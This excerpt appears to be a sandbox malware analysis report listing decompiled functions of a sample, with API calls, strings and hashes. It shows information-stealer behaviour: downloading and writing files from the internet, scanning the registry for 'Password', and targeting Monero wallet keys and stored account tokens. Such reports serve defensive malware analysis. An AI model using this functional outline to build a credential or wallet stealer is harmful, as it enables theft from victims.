                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00A4618F
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00A461B3
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00A461DC
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A4620A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00A46249
                                        • InternetCloseHandle.WININET(?), ref: 00A46253
                                        • InternetCloseHandle.WININET(00000000), ref: 00A46260
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 83f5fe14671c6c14b445492fa908958ce51592bcc6956d8cb85f9977510d970d
                                        • Instruction ID: 17ad60f36c222320a9258a27653425d1650c262d23452a16ed5568abfe9e97e6
                                        • Opcode Fuzzy Hash: 83f5fe14671c6c14b445492fa908958ce51592bcc6956d8cb85f9977510d970d
                                        • Instruction Fuzzy Hash: 3A5165B5A00218ABEF20DF60DD45BEE7778FB44701F108199F605A71C1DBB46A89CF96
                                        Function 00A472D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A4733A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A473B1
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A4740D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A47452
                                        • HeapFree.KERNEL32(00000000), ref: 00A47459
                                        • task.LIBCPMTD ref: 00A47555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: 0469ea1d4f4c42f882cfb9060ebc9bbb8c32bda3eb06f9ee7248e9fb5364671d
                                        • Instruction ID: ac551f9b9d5323e3695ec2c937a33578b5a82858f675815521917e88728403dc
                                        • Opcode Fuzzy Hash: 0469ea1d4f4c42f882cfb9060ebc9bbb8c32bda3eb06f9ee7248e9fb5364671d
                                        • Instruction Fuzzy Hash: C5613CB99041689BDB24DB50DD41FEEB7B8BF84300F0081E9E649A6141DBB46FC9CFA1
                                        Function 00A4BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                        • lstrlen.KERNEL32(00000000), ref: 00A4BC9F
                                          • Part of subcall function 00A58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A58E52
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00A4BCCD
                                        • lstrlen.KERNEL32(00000000), ref: 00A4BDA5
                                        • lstrlen.KERNEL32(00000000), ref: 00A4BDB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 02ce3a61080077930854852ea7d215169cf384f5afcdbbc9de533c67e78e1e74
                                        • Instruction ID: b055cd97b90403e1b800d7cba27ac9366836823cc5f5452e52b6393febab1d3b
                                        • Opcode Fuzzy Hash: 02ce3a61080077930854852ea7d215169cf384f5afcdbbc9de533c67e78e1e74
                                        • Instruction Fuzzy Hash: 72B14471A10118ABDB04FBA0CE96EEE7738BF64301F444659F907A6191FF346A4DCB62
                                        Function 00A56770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: 82410dabf260dfdea12f7d5e8785637217829be4361ab944960d56d49a9d9f30
                                        • Instruction ID: 4041b63a00694a7f54ebf98817c5bf63941667e84028e36c89c80f2f92c6c575
                                        • Opcode Fuzzy Hash: 82410dabf260dfdea12f7d5e8785637217829be4361ab944960d56d49a9d9f30
                                        • Instruction Fuzzy Hash: 97F0FE31944219EFE7449FE0E90976CBB70FB0D707F14019AE60987290D6784B51EB9A
                                        Function 00A44FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A44FCA
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A44FD1
                                        • InternetOpenA.WININET(00A60DDF,00000000,00000000,00000000,00000000), ref: 00A44FEA
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00A45011
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00A45041
                                        • InternetCloseHandle.WININET(?), ref: 00A450B9
                                        • InternetCloseHandle.WININET(?), ref: 00A450C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 28aaf9e483a61bc024c051cfaa58af4ebf2e35ef59f4f6e5843411f4a485982c
                                        • Instruction ID: 799388aec2d6eea07439f59d064e83e1bc437e1d571640f07d62c048533175ba
                                        • Opcode Fuzzy Hash: 28aaf9e483a61bc024c051cfaa58af4ebf2e35ef59f4f6e5843411f4a485982c
                                        • Instruction Fuzzy Hash: 223104B8A00218ABDB20CF54DC85BDDB7B4FB88704F5081D9EB09A7281D7706EC58F99
                                        Function 00A583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A58426
                                        • wsprintfA.USER32 ref: 00A58459
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A5847B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A5848C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A58499
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                        • RegQueryValueExA.ADVAPI32(00000000,0160E740,00000000,000F003F,?,00000400), ref: 00A584EC
                                        • lstrlen.KERNEL32(?), ref: 00A58501
                                        • RegQueryValueExA.ADVAPI32(00000000,0160E698,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A60B34), ref: 00A58599
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A58608
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A5861A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: f322c8bd5694fa5e2d2bc623feec48c9180ac5ac233eac195beded670b663652
                                        • Instruction ID: 11793f7b5e2273cc1f9f2d6cf74783676168f051736c811944dc3eb9b36e104c
                                        • Opcode Fuzzy Hash: f322c8bd5694fa5e2d2bc623feec48c9180ac5ac233eac195beded670b663652
                                        • Instruction Fuzzy Hash: 6321EB71A10218AFEB24DB54DC85FE9B7B8FB48701F00C5D9E609A6180DF75AA85CFE4
                                        Function 00A57690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A576A4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A576AB
                                        • RegOpenKeyExA.ADVAPI32(80000002,015FBFB0,00000000,00020119,00000000), ref: 00A576DD
                                        • RegQueryValueExA.ADVAPI32(00000000,0160E638,00000000,00000000,?,000000FF), ref: 00A576FE
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A57708
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 1e8b339d07bb9013e9dec511e6804488e027242990919c9ba3f0d3c7fbdff1a6
                                        • Instruction ID: 891cffede1fd7702aa4f3ce83a3ff366f6e551f0267e2e5dd325147775bdecb7
                                        • Opcode Fuzzy Hash: 1e8b339d07bb9013e9dec511e6804488e027242990919c9ba3f0d3c7fbdff1a6
                                        • Instruction Fuzzy Hash: 93014FB5A04204BBEB00DBE4ED49F6EB7B8EB48701F104455FE04E7291E67499048B65
                                        Function 00A57720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57734
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A5773B
                                        • RegOpenKeyExA.ADVAPI32(80000002,015FBFB0,00000000,00020119,00A576B9), ref: 00A5775B
                                        • RegQueryValueExA.ADVAPI32(00A576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00A5777A
                                        • RegCloseKey.ADVAPI32(00A576B9), ref: 00A57784
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: b308636ce5967737d0aa34067dad3b89620f99a68cd41dc44bd73e169db98fba
                                        • Instruction ID: 7bd57b52fc8fee1cac22e82c9c244bf5653ffb53e474efc3a8ee6e19ccc6cdbf
                                        • Opcode Fuzzy Hash: b308636ce5967737d0aa34067dad3b89620f99a68cd41dc44bd73e169db98fba
                                        • Instruction Fuzzy Hash: B30167B5A40308BBE700DBE0DC49FAEB7B8FB48701F004559FA05A7291D67465008B65
                                        Function 00A499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                        • ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                        • LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                        • CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 1861bb783710bf201f000c8efbdab0b4173d55240725bb2eeb36a6b738ffc44a
                                        • Instruction ID: 2edee561117f96127a4e32f3562ee6016af0c66f4c23c2ddcbb60a3cc482fb31
                                        • Opcode Fuzzy Hash: 1861bb783710bf201f000c8efbdab0b4173d55240725bb2eeb36a6b738ffc44a
                                        • Instruction Fuzzy Hash: 86312D78A00209EFDB14CF94C985BEF77B5FF88341F108169E911A7290D778A952CFA1
                                        Function 00A54780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcat.KERNEL32(?,0160E218), ref: 00A547DB
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54801
                                        • lstrcat.KERNEL32(?,?), ref: 00A54820
                                        • lstrcat.KERNEL32(?,?), ref: 00A54834
                                        • lstrcat.KERNEL32(?,015FB7F8), ref: 00A54847
                                        • lstrcat.KERNEL32(?,?), ref: 00A5485B
                                        • lstrcat.KERNEL32(?,0160DBE0), ref: 00A5486F
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A58D90: GetFileAttributesA.KERNEL32(00000000,?,00A41B54,?,?,00A6564C,?,?,00A60E1F), ref: 00A58D9F
                                          • Part of subcall function 00A54570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A54580
                                          • Part of subcall function 00A54570: RtlAllocateHeap.NTDLL(00000000), ref: 00A54587
                                          • Part of subcall function 00A54570: wsprintfA.USER32 ref: 00A545A6
                                          • Part of subcall function 00A54570: FindFirstFileA.KERNEL32(?,?), ref: 00A545BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
